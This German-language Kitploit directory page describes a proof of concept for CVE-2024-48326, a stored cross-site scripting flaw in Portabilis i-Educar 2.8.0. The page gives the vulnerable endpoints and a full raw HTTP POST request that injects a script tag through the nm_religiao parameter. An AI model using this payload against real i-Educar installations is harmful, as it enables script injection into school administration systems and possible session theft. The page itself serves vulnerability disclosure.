Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-48326 — Proof-of-concept-Exploit für eine gespeicherte Cross-Site-Scripting (XSS)-Sicherheitslücke in Portabilis i-Educar v2.8.0 über den Parameter nm_religiao, die eine nicht authentifizierte Remote-JavaScript-Injection ermöglicht. | Kitploit
Tools/GitHubGitHub/fabiobsj/cve-2024-48326
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubfabiobsj/cve-2024-48326

CVE-2024-48326

Proof-of-concept-Exploit für eine gespeicherte Cross-Site-Scripting (XSS)-Sicherheitslücke in Portabilis i-Educar v2.8.0 über den Parameter nm_religiao, die eine nicht authentifizierte Remote-JavaScript-Injection ermöglicht.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-48326

Beschreibung: Portabilis i-Educar v2.8.0 ist anfällig für Cross-Site Scripting (XSS) über den Parameter nm_religiao in der POST-Anfrage unter /intranet/educar_religiao_cad.php und wird in der GET-Anfrage unter /intranet/educar_religiao_lst.php?busca=S&nm_religiao= ausgelöst. Dies ermöglicht es einem nicht authentifizierten Remote-Angreifer, bösartiges JavaScript zu injizieren, das beim Betrachten der Daten ausgeführt wird und möglicherweise zu unbefugten Aktionen oder Datenlecks führt.

Versionen: Entdeckt in Portabilis i-Educar 2.8.0.

Proof of Concept

Details der Sicherheitslücke

Das Problem tritt im Parameter nm_religiao der Datei educar_religiao_cad.php auf, der es ermöglicht, unsanitisierte Benutzereingaben zu speichern und anschließend als JavaScript beim Laden der Seite auszuführen.

Betroffene Komponente:

Der Parameter nm_religiao in /intranet/educar_religiao_cad.php bereinigt Benutzereingaben nicht ordnungsgemäß, was gespeichertes XSS ermöglicht. Wenn ein Angreifer JavaScript injiziert, wird es ausgeführt, sobald auf die Daten zugegriffen wird.

Beispiel einer Manipulation:

root@kitploit:~
POST /intranet/educar_religiao_cad.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/intranet/educar_religiao_cad.php
Cookie: i_educar_session=1eqkHtEgzh7xrusxYcQ3AkZeRRjRMJlhTtib1n8J
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

tipoacao=Novo&cod_religiao=&nm_religiao=<script>alert("CVE")</script>

Schritte zur Reproduktion

  • Eingabe
  • Ausgelöst
Tool herunterladen